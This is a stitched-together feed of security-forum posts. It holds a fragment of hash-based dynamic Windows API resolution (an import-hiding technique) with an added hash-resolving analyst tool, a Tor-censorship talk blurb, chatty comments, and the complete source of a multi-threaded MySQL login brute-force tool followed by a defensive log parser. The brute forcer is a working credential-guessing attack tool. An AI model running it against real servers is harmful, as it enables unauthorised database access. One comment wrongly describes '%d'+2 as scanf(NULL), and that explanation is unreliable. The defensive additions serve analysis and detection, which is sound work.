        LPVOID k32;
        LPVOID user32;
        k32 = get_k32base();
        fillAPIPtrs(k32, sizeof(Kernel32Hashes) / sizeof(DWORD), Kernel32Hashes, Kernel32Ptrs);
        if (LLW)
        {
            user32 = LLW(L"user32");
            if (user32)
            {
                fillAPIPtrs(user32, sizeof(User32Hashes) / sizeof(DWORD), User32Hashes, User32Ptrs);
                if (MBW && MBA)
                {
                    if (MBW(NULL, L":D", L"Hello World!", MB_YESNO) == IDYES)
                        MBA(NULL, "Party All the Time", "\\o/", MB_OK);
                    else
                        MBA(NULL, "y u gay?", "D:", MB_OK);
                }
            }
        }
        return 0;
    }

Source: http://www.hackhound.org/forum/topic/43503-dynamic-api-calling/
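The analyst's side of the hash-based import trick above, as an added example (mine, not from the post): reimplement the same DJB hash (seed 5381, hash*33 + byte, 32-bit wrap) and run a wordlist of export names through it to recover which APIs a sample's hash constants refer to. The wordlist here is constructed; in practice you would feed it the export tables of the DLLs the sample loads. Portable C, no Windows headers needed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Same function as the post's DJBHash(): seed 5381, hash*33 + byte, wrapped to 32 bits. */
uint32_t djb_hash(const char *s) {
    uint32_t h = 5381;
    for (; *s; s++)
        h = (h << 5) + h + (unsigned char)*s;
    return h;
}

/* Constructed wordlist of export names an analyst would try first; extend it with a
   dump of the export tables of kernel32/user32/etc. for real samples. */
static const char *const KNOWN_EXPORTS[] = {
    "LoadLibraryA", "LoadLibraryW", "GetProcAddress", "VirtualAlloc", "CreateFileW",
    "WriteProcessMemory", "CreateRemoteThread", "MessageBoxA", "MessageBoxW", "WinExec",
};

/* Returns the export name whose DJB hash equals target, or NULL if nothing in the list matches. */
const char *resolve_api_hash(uint32_t target) {
    for (size_t i = 0; i < sizeof KNOWN_EXPORTS / sizeof KNOWN_EXPORTS[0]; i++)
        if (djb_hash(KNOWN_EXPORTS[i]) == target)
            return KNOWN_EXPORTS[i];
    return NULL;
}

/* Resolves every constant in hashes into names_out; returns how many were identified. */
size_t resolve_all(const uint32_t *hashes, size_t n, const char **names_out) {
    size_t found = 0;
    for (size_t i = 0; i < n; i++) {
        names_out[i] = resolve_api_hash(hashes[i]);
        if (names_out[i])
            found++;
    }
    return found;
}

int main(void) {
    /* The three constants defined in the post, plus one constructed value that will not resolve. */
    const uint32_t sample[] = { 0x5FBFF111u, 0x384F14CAu, 0x384F14B4u, 0xDEADBEEFu };
    const char *names[4];
    size_t found = resolve_all(sample, 4, names);
    for (size_t i = 0; i < 4; i++)
        printf("0x%08X -> %s\n", sample[i], names[i] ? names[i] : "(unknown)");
    printf("%zu of 4 resolved\n", found);
    return 0;
}
```

Because the hash is linear in the last byte, sibling A/W exports differ by exactly 'W' - 'A' = 22, which is a quick sanity check when you pull constants out of a sample by hand.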
-
[h=1]28C3: How governments have tried to block Tor (en)[/h]

For more information visit: 28C3: speakers
To download the video visit: Documentation - 28C3 public wiki
Playlist 28C3: 28C3: Behind Enemy Lines - YouTube
Speakers: Jacob Appelbaum | Roger Dingledine

Iran blocked Tor handshakes using Deep Packet Inspection (DPI) in January 2011 and September 2011. Bluecoat tested out a Tor handshake filter in Syria in June 2011. China has been harvesting and blocking IP addresses for both public Tor relays and private Tor bridges for years. Roger Dingledine and Jacob Appelbaum will talk about how exactly these governments are doing the blocking, both in terms of what signatures they filter in Tor (and how we've gotten around the blocking in each case), and what technologies they use to deploy the filters -- including the use of Western technology to operate the surveillance and censorship infrastructure in Tunisia (Smartfilter), Syria (Bluecoat), and other countries. We'll cover what we've learned about the mindset of the censor operators (who in many cases don't want to block Tor because they use it!), and how we can measure and track the wide-scale censorship in these countries. Last, we'll explain Tor's development plans to get ahead of the address harvesting and handshake DPI arms races.

Link:

I just watched it; it's something that has to be seen. What happened in Iran, China, Syria, Tunisia and Egypt can happen here too, and it's good to know what is going on and what can be done about traffic monitoring.
-
You need a host? You have no money from the private, unique and clever stuff you have, probably found by yourself? Let's be serious, the idea is garbage.
-
Hackers who know how to download LOIC and click once. Professionals.
-
It's scanf, read up on it. It returns 0 on error, which is probably what happens here too, or else the number of items read. Here it reads "%d" + 2. That "%d" sits in memory as % d NULL, so it's practically a: scanf(NULL); meaning it returns 0. Nothing is printed anyway, but that's how it works.
-
"dfsdfdsf" - character string, a pointer to a NULL-terminated character string
"%d" - same as above
"%d" + 2 - same as above, +2 added to the pointer's address
-
SIOCSIFFLAGS: Unknown error 132
Nytro replied to pyth0n3's topic in Sisteme de operare si discutii hardware
Have you tried an older kernel version? Does the kernel have support for "promiscuous mode"? Maybe the SIOCSIFFLAGS IOCTL isn't being used properly, maybe changes were made in newer kernel versions, although I doubt it... I read a little, and it seems to be related to how the network card is put into "promiscuous mode", either with ifconfig or programmatically, with this IOCTL, but I don't have time to read up on it now and I don't think I'd find anything concrete. -
Yes, nice, I was hoping to learn something about the exploit itself. I read the "story" of a stack overflow in another file type, also in VLC, and it's extremely interesting, how that stack overflow was found and how it could be exploited. And it's not simple at all. Anyway, VLC has a parser for the file formats, and I think it should work for any extension of that file. Also, VLC seemed to have a plugin for Mozilla too; I wonder whether the payload would execute if that file were embedded in an HTML page to be viewed in the browser?
-
Honestly, nothing impressed me.
-
MySQL Brute Force Tool
Authored by James Stevenson | Site stev.org
Posted Jan 19, 2012
This is a small MySQL cracking tool capable of running login attempts from multiple threads in parallel. It is capable of 1024 concurrent connections.

/*
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU Library General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 *
 * $Id: brute-mysql.c,v 1.1 2012/01/19 22:32:19 james.stevenson Exp $
 *
 * Author:
 *   NAME: James Stevenson
 *   WWW: http://www.stev.org
 */
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <getopt.h>
#include <string.h>
#include <pthread.h>
#include <mysql/mysql.h>

int verbose = 0;
int total = 0;
volatile int quit = 0;                      /* set by the first thread that succeeds */
pthread_mutex_t mutex_pass = PTHREAD_MUTEX_INITIALIZER;   /* serialises reads from stdin */

struct args {
    char *host;
    char *db;
    int port;
};

void print_help(FILE *fp, char *app)
{
    fprintf(fp, "Usage: %s [<options>]\n", app);
    fprintf(fp, "\n");
    fprintf(fp, " -h Print this help and exit\n");
    fprintf(fp, " -v Verbose. Repeat for more info\n");
    fprintf(fp, " -t <host> host to try\n");
    fprintf(fp, " -p <port> port to connect on\n");
    fprintf(fp, " -d <db> database to select (default: mysql)\n");
    fprintf(fp, " -n <num> number of threads to use\n");
    fprintf(fp, "\n");
    fprintf(fp, "Note: usernames / password will be read from stdin\n");
    fprintf(fp, "The format for this is username:password\n");
    fprintf(fp, "\n");
}

/* One login attempt. Returns 1 on success, 0 on any failure. */
int try(char *hostname, char *username, char *password, char *db, int port)
{
    MYSQL mysql;
    mysql_init(&mysql);
    if (!mysql_real_connect(&mysql, hostname, username, password, db, port, NULL, 0)) {
        switch (mysql_errno(&mysql)) {
        case 1045: /* ER_ACCESS_DENIED_ERROR */
            if (verbose >= 1)
                printf("Failed: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql));
            break;
        default:
            printf("Unknown Error: %d -> %s\n", mysql_errno(&mysql), mysql_error(&mysql));
            break;
        }
        mysql_close(&mysql);    /* release the handle on failure too (the original leaked it) */
        return 0;
    }
    if (verbose >= 1)
        printf("Success: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql));
    mysql_close(&mysql);
    return 1;
}

/* Read the next "username:password" line from stdin under the mutex and split it in place.
 * Returns 1 with *username/*password set, 0 at end of input or on a line without ':'. */
int getpassword(char **buf, size_t *buflen, char **username, char **password)
{
    pthread_mutex_lock(&mutex_pass);
    if (getline(buf, buflen, stdin) >= 0) {
        pthread_mutex_unlock(&mutex_pass);
        char *tmp = strchr(*buf, ':');
        if (tmp == 0 || tmp[1] == 0)
            return 0;
        *username = *buf;
        *tmp = 0;
        tmp++;
        *password = tmp;
        tmp = strchr(*password, '\n');
        if (tmp != 0)
            *tmp = 0;
        if (verbose >= 2)
            printf("username: %s password: %s\n", *username, *password);
        return 1;
    }
    pthread_mutex_unlock(&mutex_pass);
    return 0;
}

/* Worker thread: keeps pulling credentials until the input is exhausted or another thread succeeded. */
void *run(void *p)
{
    struct args *a = (struct args *) p;
    char *buf = 0;
    size_t buflen = 0;
    char *user = 0;
    char *pass = 0;
    while (quit == 0) {
        if (getpassword(&buf, &buflen, &user, &pass) == 0)
            goto free; /* we ran out of passwords */
        if (try(a->host, user, pass, a->db, a->port)) {
            printf("Success! Username: %s Password: %s\n", user, pass);
            quit = 1;
            goto free;
        }
    }
free:
    if (buf != NULL)
        free(buf);
    pthread_exit(NULL);
    return NULL;
}

int main(int argc, char **argv)
{
    struct args args;
    pthread_t *thd;
    pthread_attr_t attr;
    int nthreads = 1;
    int i = 0;
    int c;

    memset(&args, 0, sizeof(args));
    while ((c = getopt(argc, argv, "d:hn:p:t:v")) != -1) {
        switch (c) {
        case 'd':
            args.db = optarg;
            break;
        case 'h':
            print_help(stdout, argv[0]);
            exit(EXIT_SUCCESS);
            break;
        case 'n':
            nthreads = atoi(optarg);
            break;
        case 't':
            args.host = optarg;
            break;
        case 'v':
            verbose++;
            break;
        case 'p':
            args.port = atoi(optarg);
            break;
        }
    }
    if (args.db == NULL)
        args.db = "mysql";
    if (args.host == NULL)
        args.host = "localhost";

    thd = malloc(nthreads * sizeof(*thd));
    if (!thd) {
        perror("malloc");
        exit(EXIT_FAILURE);
    }
    mysql_library_init(0, NULL, NULL);
    if (pthread_attr_init(&attr) != 0) {
        perror("pthread_attr_init");
        exit(EXIT_FAILURE);
    }
    if (pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE) != 0) {
        perror("pthread_attr_setdetachstate");
        exit(EXIT_FAILURE);
    }
    for (i = 0; i < nthreads; i++) {
        /* the original passed NULL here, leaving the initialised attr unused; joinable is the default either way */
        if (pthread_create(&thd[i], &attr, run, &args) != 0) {
            perror("pthread_create");
            exit(EXIT_FAILURE);
        }
    }
    for (i = 0; i < nthreads; i++) {
        if (pthread_join(thd[i], NULL) != 0) {
            perror("pthread_join");
            exit(EXIT_FAILURE);
        }
    }
    pthread_attr_destroy(&attr);
    free(thd);
    mysql_library_end();
    return EXIT_SUCCESS;
}

Source: MySQL Brute Force Tool - Packet Storm
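A defender's counterpart to the tool above, added here and not part of the Packet Storm listing: a parser that tallies MySQL "Access denied for user" log events per client host and flags hosts that reach a threshold, which is the footprint a multi-threaded login sweep leaves in the server's error log. The log lines are constructed for the example (they follow the wording of MySQL's access-denied warning) and the threshold of 3 is an assumption.

```c
#include <stdio.h>
#include <string.h>
struct host_count { char host[64]; int failures; };
/* Pull the client host out of a MySQL "Access denied for user 'u'@'h'" line;
 * returns 1 and fills host, or 0 when the line is not an access-denied event. */
int parse_denied_host(const char *line, char *host, size_t hostlen) {
    static const char marker[] = "Access denied for user '";
    const char *p = strstr(line, marker), *end;
    if (!p || !(p = strchr(p + sizeof marker - 1, '@')) || p[1] != '\'') return 0;
    p += 2;                                             /* now at start of host */
    if (!(end = strchr(p, '\'')) || (size_t)(end - p) >= hostlen) return 0;
    memcpy(host, p, (size_t)(end - p));
    host[end - p] = '\0';
    return 1;
}
/* Tally failures per client host; returns how many hosts reached threshold and
 * leaves the per-host counts in table (*nhosts entries are used). */
int flag_bruteforce_sources(const char *const *lines, int nlines, int threshold,
                            struct host_count *table, int tablesize, int *nhosts) {
    int used = 0, flagged = 0, i, j;
    char host[64];
    for (i = 0; i < nlines; i++) {
        if (!parse_denied_host(lines[i], host, sizeof host)) continue;
        for (j = 0; j < used && strcmp(table[j].host, host) != 0; j++) { }
        if (j == used) {                                /* first sighting of host */
            if (used == tablesize) continue;            /* table full: skip new hosts */
            strcpy(table[used].host, host);
            table[used++].failures = 0;
        }
        if (++table[j].failures == threshold) flagged++;  /* each host counted once */
    }
    *nhosts = used;
    return flagged;
}

/* Constructed sample: one host cycling through accounts, one ordinary typo. */
static const char *const sample_log[] = {
    "2012-01-19T22:32:19Z 12 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)",
    "2012-01-19T22:32:19Z 13 [Warning] Access denied for user 'admin'@'10.0.0.5' (using password: YES)",
    "2012-01-19T22:32:20Z 14 [Note] Plugin 'FEDERATED' is disabled.",
    "2012-01-19T22:32:20Z 15 [Warning] Access denied for user 'test'@'10.0.0.5' (using password: NO)",
    "2012-01-19T22:32:21Z 16 [Warning] Access denied for user 'bob'@'192.168.1.2' (using password: YES)",
};
/* Run the constructed sample with threshold 3; returns the flagged-host count. */
int demo(void) {
    struct host_count table[16]; int n;
    return flag_bruteforce_sources(sample_log, (int)(sizeof sample_log / sizeof *sample_log),
                                   3, table, 16, &n);
}
int main(void) { printf("%d host(s) look like brute-force sources\n", demo()); return 0; }
```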
-
Look for the book "Java de la 0 la expert"; I think I saw it at Diverta. It covers much of what Java is about and it is explained step by step. Once again, I think it is among the best books I have read. PS: My advice is not to take a job, not in a field you don't know very well, because you might not like it. It is best to look for a job with the programming language you like.